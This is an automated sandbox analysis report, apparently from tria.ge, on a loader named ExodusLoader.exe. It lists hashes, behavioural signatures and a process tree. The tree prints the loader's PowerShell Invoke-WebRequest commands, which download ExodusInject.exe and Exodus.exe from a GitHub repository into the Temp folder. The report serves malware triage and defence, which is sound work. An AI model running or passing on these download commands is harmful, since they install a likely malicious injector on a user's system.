Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
1s -
max time network
4s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
10/03/2025, 00:10
Static task
static1
Behavioral task
behavioral1
Sample
ExodusLoader.exe
Resource
win7-20240729-en
General
-
Target
ExodusLoader.exe
-
Size
89KB
-
MD5
2f3405fa61bec944ed9d869adb6a37e3
-
SHA1
4a3c839b899809ba89a99eaadecf4da6d71e8256
-
SHA256
ee854407da3d172d442c9aec8861d9e8fd4f7a5f8c4cbb785d7e55549a507234
-
SHA512
72c8309a2c439adb3790aaf7198d5cdfa5591703a039ca84982752dfc43213a94885aab5a82fc0cfd78e161a792d2c1684e0cae7e4e7d772cc98be4aabdc33c0
-
SSDEEP
1536:77fbN3eEDhDPA/pICdUkbBtW7upvaLU0bI5taxKo0IOlnToIfAwWOn:X7DhdC6kzWypvaQ0FxyNTBfAg
Malware Config
Signatures
-
pid Process 2944 powershell.exe 2852 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ExodusLoader.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2944 powershell.exe 2852 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2944 powershell.exe Token: SeDebugPrivilege 2852 powershell.exe -
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 2528 wrote to memory of 2328 2528 ExodusLoader.exe 30 PID 2528 wrote to memory of 2328 2528 ExodusLoader.exe 30 PID 2528 wrote to memory of 2328 2528 ExodusLoader.exe 30 PID 2528 wrote to memory of 2328 2528 ExodusLoader.exe 30 PID 2328 wrote to memory of 2944 2328 cmd.exe 31 PID 2328 wrote to memory of 2944 2328 cmd.exe 31 PID 2328 wrote to memory of 2944 2328 cmd.exe 31 PID 2328 wrote to memory of 2852 2328 cmd.exe 32 PID 2328 wrote to memory of 2852 2328 cmd.exe 32 PID 2328 wrote to memory of 2852 2328 cmd.exe 32
Processes
-
C:\Users\Admin\AppData\Local\Temp\ExodusLoader.exe"C:\Users\Admin\AppData\Local\Temp\ExodusLoader.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2528 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\7CBE.tmp\7CBF.tmp\7CC0.bat C:\Users\Admin\AppData\Local\Temp\ExodusLoader.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2328 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://github.com/ek4o/injector/raw/refs/heads/main/ExodusInject.exe' -OutFile 'C:\Users\Admin\AppData\Local\Temp\ExodusInject.exe'"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2944
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://github.com/ek4o/injector/raw/refs/heads/main/Exodus.exe' -OutFile 'C:\Users\Admin\AppData\Local\Temp\Exodus.exe'"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2852
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
491B
MD554436d8e8995d677f8732385734718bc
SHA1246137700bee34238352177b56fa1c0f674a6d0b
SHA25620c5e5f392f2ad19b9397fd074d117c87ca3da37f1151736dbd20322ea7e12c3
SHA51257ffc0f920bbaf36bbd22ea90c14670f44766e4b81509f54b1dec1be4443e51d8bf0997198de0851e1ea4993e5d786e21c9c1f7f17c792da88eb6bb4a324f448
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5411c8ad4a192f37f9747a5a07d5d9c0b
SHA163593c40a8b973b4cd7cdd76af890669d839a9ea
SHA256d8d5a71adcce2b9a6eb4356c2cd4c111799d57fdafce750cde8edf45eab32160
SHA51247726aa085218000a2180a255beded25843017824df312167b44ae494e6668b4c5b35ffa6a152928871cfe175202ddd463d5b5c3c0a13274f8572c2fdcddd67a